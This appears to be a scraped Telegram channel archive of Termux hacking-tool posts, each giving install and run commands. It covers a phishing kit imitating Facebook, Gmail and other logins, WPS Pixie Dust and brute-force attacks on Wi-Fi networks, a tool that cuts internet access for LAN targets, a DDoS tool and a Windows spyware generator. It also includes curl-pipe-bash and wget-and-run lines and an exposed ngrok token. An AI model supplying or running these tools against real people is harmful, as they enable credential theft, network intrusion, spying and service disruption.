en
Feedback
Termux

Termux

Open in Telegram

Termux-Collection

Show more
The country is not specifiedCryptocurrencies104 401
797
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
wifite3install.txt0.04 KB

¶¶ This package contains the rockyou.txt wordlist and has an installation size of 134 MB. #wordlist #rockyou #fern sudo apt i
¶¶ This package contains the rockyou.txt wordlist and has an installation size of 134 MB. #wordlist #rockyou #fern sudo apt install wordlists wordlists -h > wordlists ~ Contains the rockyou wordlist /usr/share/wordlists |--dirb |--dirbuster |--dnsmap.txt |--fasttrack.txt |--fern-wifi |--metasploit |--nmap.lst |--rockyou.txt.gz |--seclists |--wfuzz

¶¶ sherlock #sherlock #socialmedia #info #nethunter #termux šŸ“git clone https://github.com/sherlock-project/sherlock.git šŸ“cd
¶¶ sherlock #sherlock #socialmedia #info #nethunter #termux šŸ“git clone https://github.com/sherlock-project/sherlock.git šŸ“cd sherlock šŸ“python3 -m pip install -r requirements.txt šŸ“python3 sherlock --help ¶¶ To search for only one user: šŸ“python3 sherlock user123 ¶¶ To search for more than one user: šŸ“python3 sherlock user1 user2 user3

¶¶ JFScan lets you utilize Masscan to scan for open ports and use Nmap scripts on discovered ports to scan for services. JFSc
¶¶ JFScan lets you utilize Masscan to scan for open ports and use Nmap scripts on discovered ports to scan for services. JFScan allows you to run a scan of many different targets using the targets flag(-t) followed by a text file with the domain/IP/URL listed inside. šŸ“sudo apt install libpcap-dev git clone https://github.com/robertdavidgraham/masscan šŸ“cd masscan šŸ“make šŸ“sudo make install šŸ“sudo setcap CAP_NET_RAW+ep /usr/bin/masscan ¶¶ to install JFScan back in your home directory šŸ“cd ~ šŸ“git clone https://github.com/nullt3r/jfscan.git $ šŸ“cd jfscan šŸ“pip3 install . usage: jfscan [-h] -t TARGETS [--resolvers RESOLVERS] [-m MODULES] (-p PORTS | -tp TOP_PORTS) [-r MAX_RATE] [-oi] [-od] [-q] [--nmap] [--nmap-options NMAP_OPTIONS] [--nmap-threads NMAP_THREADS] [--nmap-output NMAP_OUTPUT]

¶¶ Golismero Web Application Vulnerability Scanner sudo bash apt-get install python2.7 python2.7-dev python-pip python-docuti
¶¶ Golismero Web Application Vulnerability Scanner sudo bash apt-get install python2.7 python2.7-dev python-pip python-docutils git perl nmap sslscan cd /opt git clone https://github.com/golismero/golismero.git cd golismero pip install -r requirements.txt pip install -r requirements_unix.txt ln -s /opt/golismero/golismero.py /usr/bin/golismero exit

¶¶ PyPhisher /65Tools #phishing #socialmedia #kalinethunter #termux Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others git clone https://github.com/KasRoudra/PyPhisher cd PyPhisher python3 pyphisher.py ¶¶ Or, directly run wget https://raw.githubusercontent.com/KasRoudra/PyPhisher/main/pyphisher.py && python3 pyphisher.py

¶¶ wpspin WPS PIN generator uses known MAC address based algorithms commonly found in routers firmware to generate their defa
¶¶ wpspin WPS PIN generator uses known MAC address based algorithms commonly found in routers firmware to generate their default PINs. The PIN can be used with programs like Reaver, Bully or OneShot to recover Wi-Fi password. Installation šŸ“pip install wpspin Or you can install from source with: šŸ“git clone https://github.com/drygdryg/wpspin.git šŸ“cd wpspin/ šŸ“python setup.py install Example: šŸ“$ wpspin 54:A0:50:75:D2:40

¶¶ Please note that root access is required. Using installer curl -sSf https://raw.githubusercontent.com/drygdryg/OneShot_Termux_installer/master/installer.sh | bash ¶¶ Manually Installing requirements šŸ“pkg install -y root-repo šŸ“pkg install -y git tsu python šŸ“wpa-supplicant pixiewps iw ¶¶ Getting OneShot šŸ“git clone --depth 1 https://github.com/drygdryg/OneShot OneShot ¶¶ Running šŸ“sudo python OneShot/oneshot.py -i wlan0 --iface-down -K ¶¶ Start Pixie Dust attack on a specified BSSID: šŸ“sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K ¶¶ Show avaliable networks and start šŸ“sudo python3 oneshot.py -i wlan0 -K ¶¶ Launch online WPS bruteforce šŸ“sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234 ¶¶ Start WPS push button connection:s šŸ“sudo python3 oneshot.py -i wlan0 --pbc ¶¶ Troubleshooting check this link below and give it a try it .tested on samsung note10 plus / and as u can see it works for me šŸ“https://github.com/drygdryg/OneShot

¶¶ PyPhisher /65Tools #phishing #socialmedia #kalinethunter #termux ¶¶ Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others šŸ“git clone https://github.com/KasRoudra/PyPhisher šŸ“cd PyPhisher šŸ“python3 pyphisher.py ¶¶ Or, directly run šŸ“wget https://raw.githubusercontent.com/KasRoudra/PyPhisher/main/pyphisher.py && python3 pyphisher.py

¶¶ Seema #wordlist a random password generator tool which generates a random password of your choice. If you wants easy passw
¶¶ Seema #wordlist a random password generator tool which generates a random password of your choice. If you wants easy password, then it will generate a random easy password and give you and ask from you whether you wants to save or not. If you doesn't want to save your password and it will stop processing but if you wants to save your password then, it will ask from you a name for your password. šŸ“apt-get update && apt-get upgrade -y šŸ“apt-get install python git -y šŸ“git clone https://github.com/adarshaddee/Seema.git šŸ“cd Seema šŸ“chmod +x setup.sh šŸ“./setup.sh OR YOU CAN USE šŸ“pip install -r requirements.txt šŸ“python Seema.py ------------------------------------------------ Random-Password-Generator Program written by Python Language Requirements apt update && apt upgrade pkg install python pip install requests Run cd Random-Password-Generator python gen_rand_passwd.py

Repost from N/a
¶¶Install ngrok on termux Open chrome ¶¶Go to https://dashboard.ngrok.com/signup Signup with a new gmail aftee that go to termux and copy past this šŸ“wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-arm64.tgz ¶¶ when download is completed ( to extract it type ) šŸ“tar vxzf ngrok-v3-stable-linux-arm64.tgz ¶¶Now go back to chrome ngrok page and lets add our ngrok token copy it full Example = ngrok config add-authtoken 55NulkHPoB9SsymNPp6U1ewIX2m_3bZakfrsceXpQR1gkay4L ( add ./ after that full link ) ¶¶Go back to termux and past i with ./ šŸ“./ngrok config add-authtoken 55NulkHPoB9SsymNPp6U1ewIX2m_3bZakfrsceXpQR1gkay4L (Open Hotspot in your phone ) before using

¶¶ megacut A new powerful Python3 tool for managing internet on a local network šŸ“git clone https://github.com/stryker-projec
¶¶ megacut A new powerful Python3 tool for managing internet on a local network šŸ“git clone https://github.com/stryker-project/megacut šŸ“cd megacut šŸ“pip install -r requirements.txt šŸ“python3 megacut.py ¶¶ Options & Syntax python3 megacut.py target gateway -m\-k\-b\-r -k Kill inet on target ip -m Permanently disable inet on target (only if -k not works) -b Disable inet for 20 seconds -r Restore inet on target ip ¶¶ Examples: python3 megacut.py 192.168.1.101 192.168.1.1 -k

¶¶ Stryker - mobile pentest --Root-Your-Device-1st-- #android #kekstore #pwnterm #kekhunter #materialhunter #stryker #pixiedust #bruteforcepin #connectwithpin #passwordbruteforce #capturehandshake #clientdeauthing Test your networks for the most effective and dangerous vulnerabilities! ¶¶Download Stryker APK -Link Below https://stryker.zalex.dev/ https://zalex.dev/stryker/#download ¶¶Github = https://github.com/stryker-project/app/releases ¶¶ The Stryker Project — user-friendly app for mobile pentest. Status: Coding Git: https://github.com/stryker-project ¶¶ If you need help join telegram channel @strykereng <- Channel with news and updates [ENG] @strykerapp <- Channel with news and updates [RU] @strykerchat <- Chat with developer ¶¶ Mini dongle /works with samsungNote9 /no need to install drivers ¶¶ Aliexpress MVR 44.09 31%OFF | 300Mbps 5dBi USB WiFi Adapter Mini Dongle External Wireless LAN Network Card 2.4GHz 802.11n/g/b for PC Computer for Win 7 8 10 https://a.aliexpress.com/_m0ThS86 ¶¶ extra long antenna 2.4G 10dBi High Gain Antenna length: 400mm https://a.aliexpress.com/_mObNMlc ¶¶ Amazone Alfa AWUS036NHA - Wireless B/G/N USB Adaptor - 802.11n - 150Mbps - 2.4 GHz - 5dBi Antenna - Long Range - Atheros Chipset - Windows XP/Vista 64-Bit /128-Bit Windows 7 Compatible https://www.amazon.com/dp/B004Y6MIXS/ref=cm_sw_r_awdo_PBARX7TVSMGAHW6M38Z7

¶¶ Stryker - mobile pentest --Root-Your-Device-1st-- #android #kekstore #pwnterm #kekhunter #materialhunter #stryker #pixiedu
¶¶ Stryker - mobile pentest --Root-Your-Device-1st-- #android #kekstore #pwnterm #kekhunter #materialhunter #stryker #pixiedust #bruteforcepin #connectwithpin #passwordbruteforce #capturehandshake #clientdeauthing Test your networks for the most effective and dangerous vulnerabilities! ¶¶Download Stryker APK -Link Below https://stryker.zalex.dev/ https://zalex.dev/stryker/#download

NExfil is an OSINT tool written in python for finding profiles by username. The provided usernames are checked on over 350 websites within few seconds. The goal behind this tool was to get results quickly while maintaining low amounts of false positives. šŸ“git clone https://github.com/thewhiteh4t/nexfil.git šŸ“cd nexfil šŸ“pip3 install -r requirements.txt ¶¶ Usage : usage: nexfil.py [-h] [-u U] [-f F] [-l L] [-t T] [-v] [-U] nexfil - Find social media profiles on the web | v1.0.1 options: -h, --help show this help message and exit -u U Specify username -f F Specify a file containing username list -l L Specify multiple comma separated usernames -t T Specify timeout [Default : 5] -v Prints version -U Check for Updates ¶¶ Single username python3 nexfil.py -u username Multiple comma separated usernames python3 nexfil.py -l "user1,user2" Username list in a file python3 nexfil.py -f users.txt

Nethunter permission error fix Download the file (nethunter.sh) Open terminal AndroidSu type su sd sdcard or /sdcard sh nethu
Nethunter permission error fix Download the file (nethunter.sh) Open terminal AndroidSu type su sd sdcard or /sdcard sh nethunter.sh when you see done (restart device your nethunter will work got this error on latest version and fixed on samsung note 10 plus and samsung note 9 = V-12 https://youtu.be/IApHZBgVfZ8

¶¶ RDDoS_Tool RedDDoS Tool is a tool for DDoS attacks. You can test networks/servers/any other devices with it #ddos #network
¶¶ RDDoS_Tool RedDDoS Tool is a tool for DDoS attacks. You can test networks/servers/any other devices with it #ddos #network #ip #flood šŸ“pip install tqdm šŸ“pip install pyfiglet šŸ“apt-get update -y šŸ“apt-get install git šŸ“git clone https://github.com/Red-company/RDDoS_Tool.git šŸ“cd RDDoS_Tool šŸ“bash setup.sh šŸ“python3 RDDoS_Tool.py

¶¶ sAINT a Spyware Generator for Windows systems written in Java. [Discontinued] The JRE is required and the executable will not work without it. Because the Windows need JRE for translating the program from java byte code to machine language. šŸ“apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre -y šŸ“apt install zlib1g-dev libncurses5-dev lib32z1 lib32ncurses6 -y ¶¶ On Windows, install the latest Java JRE 8 from Oracle = https://www.java.com/en/download/z šŸ“git clone https://github.com/tiagorlampert/sAINT.git šŸ“cd sAINT šŸ“chmod +x configure.sh šŸ“./configure.sh # Run šŸ“java -jar sAINT.jar ¶¶ Youtube Link = https://github.com/tiagorlampert/sAINT